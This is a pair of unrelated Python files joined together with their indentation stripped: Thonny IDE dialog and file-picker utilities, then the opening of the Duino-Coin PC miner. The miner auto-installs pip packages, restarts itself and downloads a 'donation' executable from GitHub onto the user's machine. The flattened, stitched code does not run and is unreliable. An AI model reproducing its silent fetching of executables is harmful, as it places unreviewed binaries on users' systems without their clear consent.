assert len(parts) == 3 and parts[0] == ""
return parts[1:]
def remove_line_numbers(s):
cleaned_lines = []
for line in s.splitlines():
parts = split_after_line_number(line)
if len(parts) != 2:
return s
else:
cleaned_lines.append(parts[1])
return textwrap.dedent(("\n".join(cleaned_lines)) + "\n")
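# For example, "1. foo\n2.   bar" becomes "foo\n  bar\n" (dedent strips the
# common leading whitespace); if any line lacks a leading number, the input
# is returned unchanged.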
def center_window(win, master=None):
# for backward compat
return assign_geometry(win, master)
def assign_geometry(win, master=None):
if master is None:
master = tk._default_root
size = get_workbench().get_option(get_size_option_name(win))
if size:
width, height = size
saved_size = True
else:
fallback_width = 600
fallback_height = 400
# need to wait until size is computed
# (unfortunately this causes dialog to jump)
if getattr(master, "initializing", False):
# can't get reliable positions when main window is not in mainloop yet
width = fallback_width
height = fallback_height
else:
if not running_on_linux():
# better to avoid in Linux because it causes ugly jump
win.update_idletasks()
# looks like it doesn't take window border into account
width = win.winfo_width()
height = win.winfo_height()
if width < 10:
                # i.e. size measurement is not correct
width = fallback_width
height = fallback_height
saved_size = False
left = master.winfo_rootx() + master.winfo_width() // 2 - width // 2
top = master.winfo_rooty() + master.winfo_height() // 2 - height // 2
if saved_size:
win.geometry("%dx%d+%d+%d" % (width, height, left, top))
else:
win.geometry("+%d+%d" % (left, top))
class WaitingDialog(tk.Toplevel):
def __init__(self, master, async_result, description, title=_("Please wait!"), timeout=None):
self._async_result = async_result
super().__init__(master)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
self.title(title)
self.resizable(height=tk.FALSE, width=tk.FALSE)
# self.protocol("WM_DELETE_WINDOW", self._close)
self.desc_label = ttk.Label(self, text=description, wraplength=300)
self.desc_label.grid(padx=20, pady=20)
self.update_idletasks()
self.timeout = timeout
self.start_time = time.time()
self.after(500, self._poll)
def _poll(self):
if self._async_result.ready():
self._close()
elif self.timeout and time.time() - self.start_time > self.timeout:
raise TimeoutError()
else:
self.after(500, self._poll)
self.desc_label["text"] = self.desc_label["text"] + "."
def _close(self):
self.destroy()
def run_with_waiting_dialog(master, action, args=(), description=_("Working")):
# http://stackoverflow.com/a/14299004/261181
from multiprocessing.pool import ThreadPool
pool = ThreadPool(processes=1)
async_result = pool.apply_async(action, args)
dlg = WaitingDialog(master, async_result, description=description)
show_dialog(dlg, master)
return async_result.get()
class FileCopyDialog(tk.Toplevel):
def __init__(self, master, source, destination, description=None, fsync=True):
self._source = source
self._destination = destination
self._old_bytes_copied = 0
self._bytes_copied = 0
self._fsync = fsync
self._done = False
self._cancelled = False
self._closed = False
super().__init__(master)
main_frame = ttk.Frame(self) # To get styled background
main_frame.grid(row=0, column=0, sticky="nsew")
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.title(_("Copying"))
if description is None:
description = _("Copying\n %s\nto\n %s") % (source, destination)
label = ttk.Label(main_frame, text=description)
label.grid(row=0, column=0, columnspan=2, sticky="nw", padx=15, pady=15)
self._bar = ttk.Progressbar(main_frame, maximum=os.path.getsize(source), length=200)
self._bar.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=15, pady=0)
self._cancel_button = ttk.Button(main_frame, text=_("Cancel"), command=self._cancel)
self._cancel_button.grid(row=2, column=1, sticky="ne", padx=15, pady=15)
self._bar.focus_set()
main_frame.columnconfigure(0, weight=1)
self._update_progress()
self.bind("<Escape>", self._cancel, True) # escape-close only if process has completed
self.protocol("WM_DELETE_WINDOW", self._cancel)
self._start()
def _start(self):
def work():
            self._copy_progress = 0
with open(self._source, "rb") as fsrc:
with open(self._destination, "wb") as fdst:
while True:
buf = fsrc.read(16 * 1024)
if not buf:
break
fdst.write(buf)
fdst.flush()
if self._fsync:
os.fsync(fdst)
self._bytes_copied += len(buf)
self._done = True
threading.Thread(target=work, daemon=True).start()
def _update_progress(self):
if self._done:
if not self._closed:
self._close()
return
self._bar.step(self._bytes_copied - self._old_bytes_copied)
self._old_bytes_copied = self._bytes_copied
self.after(100, self._update_progress)
def _close(self):
self.destroy()
self._closed = True
def _cancel(self, event=None):
self._cancelled = True
self._close()
class ChoiceDialog(tk.Toplevel):
def __init__(
self, master=None, title=_("Choose one"), question: str = _("Choose one:"), choices=[]
) -> None:
super().__init__(master=master)
self.title(title)
self.resizable(False, False)
self.columnconfigure(0, weight=1)
row = 0
question_label = ttk.Label(self, text=question)
question_label.grid(row=row, column=0, columnspan=2, sticky="w", padx=20, pady=20)
row += 1
self.var = tk.StringVar()
for choice in choices:
rb = ttk.Radiobutton(self, text=choice, variable=self.var, value=choice)
rb.grid(row=row, column=0, columnspan=2, sticky="w", padx=20)
row += 1
ok_button = ttk.Button(self, text=_("OK"), command=self._ok, default="active")
ok_button.grid(row=row, column=0, sticky="e", pady=20)
cancel_button = ttk.Button(self, text=_("Cancel"), command=self._cancel)
cancel_button.grid(row=row, column=1, sticky="e", padx=20, pady=20)
self.bind("<Escape>", self._cancel, True)
self.bind("<Return>", self._ok, True)
self.protocol("WM_DELETE_WINDOW", self._cancel)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
def _ok(self):
self.result = self.var.get()
if not self.result:
self.result = None
self.destroy()
def _cancel(self):
self.result = None
self.destroy()
class LongTextDialog(tk.Toplevel):
def __init__(self, title, text_content, parent=None):
if parent is None:
parent = tk._default_root
super().__init__(master=parent)
self.title(title)
main_frame = ttk.Frame(self)
main_frame.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
default_font = tk.font.nametofont("TkDefaultFont")
self._text = tktextext.TextFrame(
main_frame,
read_only=True,
wrap="none",
font=default_font,
width=80,
height=10,
relief="sunken",
borderwidth=1,
)
self._text.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=20, pady=20)
self._text.text.direct_insert("1.0", text_content)
self._text.text.see("1.0")
copy_button = ttk.Button(main_frame, command=self._copy, text=_("Copy to clipboard"), width=20)
copy_button.grid(row=2, column=0, sticky="w", padx=20, pady=(0, 20))
close_button = ttk.Button(main_frame, command=self._close, text=_("Close"))
close_button.grid(row=2, column=1, sticky="w", padx=20, pady=(0, 20))
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self.protocol("WM_DELETE_WINDOW", self._close)
self.bind("<Escape>", self._close, True)
def _copy(self, event=None):
self.clipboard_clear()
self.clipboard_append(self._text.text.get("1.0", "end"))
def _close(self, event=None):
self.destroy()
def ask_one_from_choices(
master=None, title=_("Choose one"), question: str = _("Choose one:"), choices=[]
):
dlg = ChoiceDialog(master, title, question, choices)
show_dialog(dlg, master)
return dlg.result
class SubprocessDialog(tk.Toplevel):
"""Shows incrementally the output of given subprocess.
Allows cancelling"""
def __init__(
self, master, proc, title, long_description=None, autoclose=True, conclusion=_("Done.")
):
self._closed = False
self._proc = proc
self.stdout = ""
self.stderr = ""
self._stdout_thread = None
self._stderr_thread = None
self.returncode = None
self.cancelled = False
self._autoclose = autoclose
self._event_queue = collections.deque()
self._conclusion = conclusion
tk.Toplevel.__init__(self, master)
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
main_frame = ttk.Frame(self) # To get styled background
main_frame.grid(sticky="nsew")
text_font = tk.font.nametofont("TkFixedFont").copy()
text_font["size"] = int(text_font["size"] * 0.9)
text_font["family"] = "Courier" if running_on_mac_os() else "Courier New"
text_frame = tktextext.TextFrame(
main_frame,
read_only=True,
horizontal_scrollbar=False,
background=lookup_style_option("TFrame", "background"),
font=text_font,
wrap="word",
)
text_frame.grid(row=0, column=0, sticky=tk.NSEW, padx=15, pady=15)
self.text = text_frame.text
self.text["width"] = 60
self.text["height"] = 7
if long_description is not None:
self.text.direct_insert("1.0", long_description + "\n\n")
self.button = ttk.Button(main_frame, text=_("Cancel"), command=self._close)
self.button.grid(row=1, column=0, pady=(0, 15))
main_frame.rowconfigure(0, weight=1)
main_frame.columnconfigure(0, weight=1)
self.title(title)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
# self.resizable(height=tk.FALSE, width=tk.FALSE)
self.text.focus_set()
self.bind(
"<Escape>", self._close_if_done, True
) # escape-close only if process has completed
self.protocol("WM_DELETE_WINDOW", self._close)
self._start_listening()
def _start_listening(self):
def listen_stream(stream_name):
stream = getattr(self._proc, stream_name)
while True:
data = stream.readline()
self._event_queue.append((stream_name, data))
setattr(self, stream_name, getattr(self, stream_name) + data)
if data == "":
break
self.returncode = self._proc.wait()
self._stdout_thread = threading.Thread(target=listen_stream, args=["stdout"], daemon=True)
self._stdout_thread.start()
if self._proc.stderr is not None:
self._stderr_thread = threading.Thread(
target=listen_stream, args=["stderr"], daemon=True
)
self._stderr_thread.start()
def poll_output_events():
if self._closed:
return
while len(self._event_queue) > 0:
stream_name, data = self._event_queue.popleft()
self.text.direct_insert("end", data, tags=(stream_name,))
self.text.see("end")
self.returncode = self._proc.poll()
            if self.returncode is None:
self.after(200, poll_output_events)
else:
self.button["text"] = _("OK")
self.button.focus_set()
if self.returncode != 0:
self.text.direct_insert("end", _("\n\nReturn code: "), ("stderr",))
elif self._autoclose:
self._close()
else:
self.text.direct_insert("end", "\n\n" + self._conclusion)
self.text.see("end")
poll_output_events()
def _close_if_done(self, event):
if self._proc.poll() is not None:
self._close(event)
def _close(self, event=None):
if self._proc.poll() is None:
if messagebox.askyesno(
_("Cancel the process?"),
_("The process is still running.\nAre you sure you want to cancel?"),
parent=self,
):
# try gently first
try:
if running_on_windows():
os.kill(self._proc.pid, signal.CTRL_BREAK_EVENT) # @UndefinedVariable
else:
os.kill(self._proc.pid, signal.SIGINT)
self._proc.wait(2)
except subprocess.TimeoutExpired:
if self._proc.poll() is None:
# now let's be more concrete
self._proc.kill()
self.cancelled = True
# Wait for threads to finish
self._stdout_thread.join(2)
if self._stderr_thread is not None:
self._stderr_thread.join(2)
# fetch output about cancelling
while len(self._event_queue) > 0:
stream_name, data = self._event_queue.popleft()
self.text.direct_insert("end", data, tags=(stream_name,))
self.text.direct_insert("end", _("\n\nPROCESS CANCELLED"))
self.text.see("end")
else:
return
else:
self._closed = True
self.destroy()
def get_busy_cursor():
if running_on_windows():
return "wait"
elif running_on_mac_os():
return "spinning"
else:
return "watch"
def get_tk_version_str():
return tk._default_root.tk.call("info", "patchlevel")
def get_tk_version_info():
result = []
for part in get_tk_version_str().split("."):
try:
result.append(int(part))
except Exception:
result.append(0)
return tuple(result)
def get_style_configuration(style_name, default={}):
style = ttk.Style()
# NB! style.configure seems to reuse the returned dict
# Don't change it without copying first
result = style.configure(style_name)
if result is None:
return default
else:
return result
def lookup_style_option(style_name, option_name, default=None):
style = ttk.Style()
setting = style.lookup(style_name, option_name)
if setting in [None, ""]:
return default
elif setting == "True":
return True
elif setting == "False":
return False
else:
return setting
def scale(value):
return get_workbench().scale(value)
def open_path_in_system_file_manager(path):
if running_on_mac_os():
# http://stackoverflow.com/a/3520693/261181
# -R doesn't allow showing hidden folders
subprocess.Popen(["open", path])
elif running_on_linux():
subprocess.Popen(["xdg-open", path])
else:
assert running_on_windows()
subprocess.Popen(["explorer", path])
def _get_dialog_provider():
if platform.system() != "Linux":
return filedialog
if shutil.which("zenity"):
return _ZenityDialogProvider
# fallback
return filedialog
def asksaveasfilename(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getSaveFile.htm
_ensure_parent(options)
return _get_dialog_provider().asksaveasfilename(**options)
def askopenfilename(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
_ensure_parent(options)
return _get_dialog_provider().askopenfilename(**options)
def askopenfilenames(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
_ensure_parent(options)
return _get_dialog_provider().askopenfilenames(**options)
def askdirectory(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/chooseDirectory.htm
_ensure_parent(options)
return _get_dialog_provider().askdirectory(**options)
def _ensure_parent(options):
if "parent" not in options:
if "master" in options:
options["parent"] = options["master"]
else:
options["parent"] = tk._default_root
class _ZenityDialogProvider:
# https://www.writebash.com/bash-gui/zenity-create-file-selection-dialog-224.html
# http://linux.byexamples.com/archives/259/a-complete-zenity-dialog-examples-1/
# http://linux.byexamples.com/archives/265/a-complete-zenity-dialog-examples-2/
# another possibility is to use PyGobject: https://github.com/poulp/zenipy
@classmethod
def askopenfilename(cls, **options):
args = cls._convert_common_options(_("Open file"), **options)
return cls._call(args)
@classmethod
def askopenfilenames(cls, **options):
args = cls._convert_common_options(_("Open files"), **options)
return cls._call(args + ["--multiple"]).split("|")
@classmethod
def asksaveasfilename(cls, **options):
args = cls._convert_common_options(_("Save as"), **options)
args.append("--save")
if options.get("confirmoverwrite", True):
args.append("--confirm-overwrite")
filename = cls._call(args)
if not filename:
return None
if "defaultextension" in options and "." not in os.path.basename(filename):
filename += options["defaultextension"]
return filename
@classmethod
def askdirectory(cls, **options):
args = cls._convert_common_options(_("Select directory"), **options)
args.append("--directory")
return cls._call(args)
@classmethod
def _convert_common_options(cls, default_title, **options):
args = ["--file-selection", "--title=%s" % options.get("title", default_title)]
filename = _options_to_zenity_filename(options)
if filename:
args.append("--filename=%s" % filename)
parent = options.get("parent", options.get("master", None))
if parent is not None:
args.append("--modal")
args.append("--attach=%s" % hex(parent.winfo_id()))
for desc, pattern in options.get("filetypes", ()):
# zenity requires star before extension
pattern = pattern.replace(" .", " *.")
if pattern.startswith("."):
pattern = "*" + pattern
if pattern == "*.*":
# ".*" was provided to make the pattern safe for Tk dialog
# not required with Zenity
pattern = "*"
args.append("--file-filter=%s | %s" % (desc, pattern))
return args
@classmethod
def _call(cls, args):
args = ["zenity", "--name=Thonny", "--class=Thonny"] + args
result = subprocess.run(
args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
if result.returncode == 0:
return result.stdout.strip()
else:
# could check stderr, but it may contain irrelevant warnings
return None
def _options_to_zenity_filename(options):
if options.get("initialdir"):
if options.get("initialfile"):
return os.path.join(options["initialdir"], options["initialfile"])
else:
return options["initialdir"] + os.path.sep
return None
def register_latin_shortcut(
registry, sequence: str, handler: Callable, tester: Optional[Callable]
) -> None:
res = sequence_to_event_state_and_keycode(sequence)
if res is not None:
if res not in registry:
registry[res] = []
registry[res].append((handler, tester))
def handle_mistreated_latin_shortcuts(registry, event):
# tries to handle Ctrl+LatinLetter shortcuts
# given from non-Latin keyboards
# See: https://bitbucket.org/plas/thonny/issues/422/edit-keyboard-shortcuts-ctrl-c-ctrl-v-etc
# only consider events with Control held
if not event.state & 0x04:
return
if running_on_mac_os():
return
# consider only part of the state,
# because at least on Windows, Ctrl-shortcuts' state
# has something extra
simplified_state = 0x04
if shift_is_pressed(event.state):
simplified_state |= 0x01
# print(simplified_state, event.keycode)
if (simplified_state, event.keycode) in registry:
if event.keycode != ord(event.char):
            # keycode and char don't match,
            # which indicates a non-latin keyboard
for handler, tester in registry[(simplified_state, event.keycode)]:
if tester is None or tester():
handler()
def show_dialog(dlg, master=None, geometry=True):
if master is None:
master = tk._default_root
get_workbench().event_generate("WindowFocusOut")
    # the following order seems to give the smoothest appearance
focused_widget = master.focus_get()
dlg.transient(master.winfo_toplevel())
if geometry:
# dlg.withdraw() # unfortunately inhibits size calculations in assign_geometry
if isinstance(geometry, str):
dlg.geometry(geometry)
else:
assign_geometry(dlg, master)
# dlg.wm_deiconify()
try:
dlg.grab_set()
    except tk.TclError:
pass
dlg.lift()
dlg.focus_set()
master.winfo_toplevel().wait_window(dlg)
dlg.grab_release()
master.winfo_toplevel().lift()
master.winfo_toplevel().focus_force()
master.winfo_toplevel().grab_set()
if focused_widget is not None:
try:
focused_widget.focus_force()
except TclError:
pass
def popen_with_ui_thread_callback(*Popen_args, on_completion, poll_delay=0.1, **Popen_kwargs):
if "encoding" not in Popen_kwargs:
if "env" not in Popen_kwargs:
Popen_kwargs["env"] = os.environ.copy()
Popen_kwargs["env"]["PYTHONIOENCODING"] = "utf-8"
if sys.version_info >= (3, 6):
Popen_kwargs["encoding"] = "utf-8"
proc = subprocess.Popen(*Popen_args, **Popen_kwargs)
# Need to read in thread in order to avoid blocking because
# of full pipe buffer (see https://bugs.python.org/issue1256)
out_lines = []
err_lines = []
def read_stream(stream, target_list):
while True:
line = stream.readline()
if line:
target_list.append(line)
else:
break
t_out = threading.Thread(target=read_stream, daemon=True, args=(proc.stdout, out_lines))
t_err = threading.Thread(target=read_stream, daemon=True, args=(proc.stderr, err_lines))
t_out.start()
t_err.start()
def poll():
if proc.poll() is not None:
t_out.join(3)
t_err.join(3)
on_completion(proc, out_lines, err_lines)
return
tk._default_root.after(int(poll_delay * 1000), poll)
poll()
return proc
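# Illustrative call (the command and callback below are hypothetical;
# a running Tk root is required because polling happens via after()):
#
#   def on_done(proc, out_lines, err_lines):
#       print("exit code:", proc.returncode)
#
#   popen_with_ui_thread_callback(
#       [sys.executable, "-m", "pip", "--version"],
#       on_completion=on_done,
#       stdout=subprocess.PIPE,
#       stderr=subprocess.PIPE,
#   )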
class MenuEx(tk.Menu):
def __init__(self, target):
self._testers = {}
super().__init__(
target, tearoff=False, postcommand=self.on_post, **get_style_configuration("Menu")
)
def on_post(self, *args):
self.update_item_availability()
def update_item_availability(self):
for i in range(self.index("end") + 1):
item_data = self.entryconfigure(i)
if "label" in item_data:
tester = self._testers.get(item_data["label"])
if tester and not tester():
self.entryconfigure(i, state=tk.DISABLED)
else:
self.entryconfigure(i, state=tk.NORMAL)
def add(self, kind, cnf={}, **kw):
cnf = cnf or kw
tester = cnf.get("tester")
if "tester" in cnf:
del cnf["tester"]
super().add(kind, cnf)
itemdata = self.entryconfigure(self.index("end"))
labeldata = itemdata.get("label")
if labeldata:
self._testers[labeldata] = tester
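# Illustrative use of the "tester" mechanism above: the callable is
# re-evaluated each time the menu is posted, enabling or disabling the
# entry (do_undo and can_undo are hypothetical):
#
#   menu = MenuEx(root)
#   menu.add_command(label="Undo", command=do_undo, tester=can_undo)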
class TextMenu(MenuEx):
def __init__(self, target):
self.text = target
MenuEx.__init__(self, target)
self.add_basic_items()
self.add_extra_items()
def add_basic_items(self):
self.add_command(label=_("Cut"), command=self.on_cut, tester=self.can_cut)
self.add_command(label=_("Copy"), command=self.on_copy, tester=self.can_copy)
self.add_command(label=_("Paste"), command=self.on_paste, tester=self.can_paste)
def add_extra_items(self):
self.add_separator()
self.add_command(label=_("Select All"), command=self.on_select_all)
def on_cut(self):
self.text.event_generate("<<Cut>>")
def on_copy(self):
self.text.event_generate("<<Copy>>")
def on_paste(self):
self.text.event_generate("<<Paste>>")
def on_select_all(self):
self.text.event_generate("<<SelectAll>>")
def can_cut(self):
return self.get_selected_text() and not self.selection_is_read_only()
def can_copy(self):
return self.get_selected_text()
def can_paste(self):
return not self.selection_is_read_only()
def get_selected_text(self):
try:
return self.text.get("sel.first", "sel.last")
except TclError:
return ""
def selection_is_read_only(self):
if hasattr(self.text, "is_read_only"):
return self.text.is_read_only()
return False
def create_url_label(master, url, text=None):
url_font = tkinter.font.nametofont("TkDefaultFont").copy()
url_font.configure(underline=1)
url_label = ttk.Label(
master, text=text if text else url, style="Url.TLabel", cursor="hand2", font=url_font
)
url_label.grid()
url_label.bind("<Button-1>", lambda _: webbrowser.open(url))
return url_label
def get_size_option_name(window):
return "layout." + type(window).__name__ + "_size"
def get_default_theme():
return "xpnative" if running_on_windows() else "clam"
if __name__ == "__main__":
root = tk.Tk()
closa = ClosableNotebook(root)
closa.add(ttk.Button(closa, text="B1"), text="B1")
closa.add(ttk.Button(closa, text="B2"), text="B2")
closa.grid()
root.mainloop()
|
PC_Miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python PC Miner (v2.45)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from hashlib import sha1
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path, system
from pathlib import Path
from platform import system as plsystem
from re import sub
from signal import SIGINT, signal
from socket import socket
from statistics import mean
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from time import ctime, sleep, strptime, time
from multiprocessing import Lock, current_process
thread_lock = Lock()
def install(package):
# Install pip package automatically
check_call([sys.executable, "-m", "pip", "install", package])
    execl(sys.executable, sys.executable, *sys.argv)
def now():
# Return datetime object
return datetime.now()
try:
# Check if cpuinfo is installed
import cpuinfo
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Cpuinfo is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"py-cpuinfo\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("py-cpuinfo")
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Colorama is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"colorama\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("colorama")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Requests is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"requests\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("requests")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Pypresence is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"pypresence\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("pypresence")
try:
# Check if xxhash is installed
import xxhash
xxhash_enabled = True
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Xxhash is not installed. "
+ "Continuing without xxhash support.")
xxhash_enabled = False
# Global variables
MINER_VER = "2.45" # Version number
SOC_TIMEOUT = 30 # Socket timeout
RESOURCES_DIR = "PCMiner_" + str(MINER_VER) + "_resources"
donatorrunning = False
debug = "n"
rig_identiier = "None"
requested_diff = "NET"
algorithm = "DUCO-S1"
server_ip_file = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/gh-pages/"
+ "serverip.txt") # Serverip file
config = ConfigParser()
donation_level = 0
thread = []
totalhashrate_mean = []
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
r = requests.get(url)
with open(RESOURCES_DIR + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if plsystem() == "Darwin":
if getlocale()[0] is None:
setlocale(LC_ALL, "en_US.UTF-8")
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
else:
# Read language variable from configfile
try:
config.read(RESOURCES_DIR + "/Miner_config.cfg")
lang = config["miner"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
except Exception:
lang = "english"
def getString(string_name):
    # Get string from language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debugOutput(text):
# Debug output
if debug == "y":
print(now().strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
# Set window title
if osname == "nt":
# Windows systems
system("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
if current_process().name == "MainProcess":
prettyPrint(
"sys0",
getString("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ getString("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def Greeting():
# Greeting message
global greeting
print(Style.RESET_ALL)
if requested_diff == "LOW":
diffName = getString("low_diff_short")
elif requested_diff == "MEDIUM":
diffName = getString("medium_diff_short")
else:
diffName = getString("net_diff_short")
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = getString("greeting_morning")
elif current_hour == 12:
greeting = getString("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = getString("greeting_afternoon")
elif current_hour >= 18:
greeting = getString("greeting_evening")
else:
greeting = getString("greeting_back")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ getString("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(MINER_VER)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.YELLOW
+ "https://github.com/revoxhere/duino-coin")
try:
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ "CPU: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(threadcount)
+ "x "
+ str(cpu["brand_raw"]))
except Exception as e:
debugOutput("Error displaying CPU message: " + str(e))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ algorithm
+ " @ "
+ diffName)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
        + rig_identifier)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
if osname == "nt":
# Initial miner executable section
if not Path(RESOURCES_DIR + "/Donate_executable.exe").is_file():
debugOutput(
"OS is Windows, downloading developer donation executable")
url = ("https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/useful-tools/"
+ "DonateExecutableWindows.exe?raw=true")
r = requests.get(url)
with open(RESOURCES_DIR + "/Donate_executable.exe", "wb") as f:
f.write(r.content)
elif osname == "posix":
# Initial miner executable section
if not Path(RESOURCES_DIR + "/Donate_executable").is_file():
            debugOutput(
                "OS is posix, downloading developer donation executable")
url = ("https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/useful-tools/"
+ "DonateExecutableLinux?raw=true")
r = requests.get(url)
with open(RESOURCES_DIR + "/Donate_executable", "wb") as f:
f.write(r.content)
def loadConfig():
# Config loading section
global username
global efficiency
global donation_level
global debug
global threadcount
global requested_diff
    global rig_identifier
global lang
global algorithm
# Initial configuration
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ getString("basic_config_tool")
+ RESOURCES_DIR
+ getString("edit_config_file_warning"))
print(
Style.RESET_ALL
+ getString("dont_have_account")
+ Fore.YELLOW
+ getString("wallet")
+ Fore.RESET
+ getString("register_warning"))
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_username")
+ Fore.RESET
+ Style.BRIGHT)
if xxhash_enabled:
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - DUCO-S1 ("
+ getString("recommended")
+ ")")
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - XXHASH")
algorithm = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_algorithm")
+ Fore.RESET
+ Style.BRIGHT)
else:
algorithm = "1"
efficiency = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_intensity")
+ Fore.RESET
+ Style.BRIGHT)
threadcount = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_threads")
+ str(cpu_count())
+ "): "
+ Fore.RESET
+ Style.BRIGHT)
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - "
+ getString("low_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - "
+ getString("medium_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "3"
+ Style.NORMAL
+ " - "
+ getString("net_diff"))
requested_diff = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_difficulty")
+ Fore.RESET
+ Style.BRIGHT)
        rig_identifier = input(
            Style.RESET_ALL
            + Fore.YELLOW
            + getString("ask_rig_identifier")
            + Fore.RESET
            + Style.BRIGHT)
        if rig_identifier in ("y", "Y"):
            rig_identifier = input(
                Style.RESET_ALL
                + Fore.YELLOW
                + getString("ask_rig_name")
                + Fore.RESET
                + Style.BRIGHT)
        else:
            rig_identifier = "None"
donation_level = "0"
if osname == "nt" or osname == "posix":
donation_level = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_donation_level")
+ Fore.RESET
+ Style.BRIGHT)
        # Check whether efficiency is correct
        efficiency = sub(r"\D", "", efficiency)
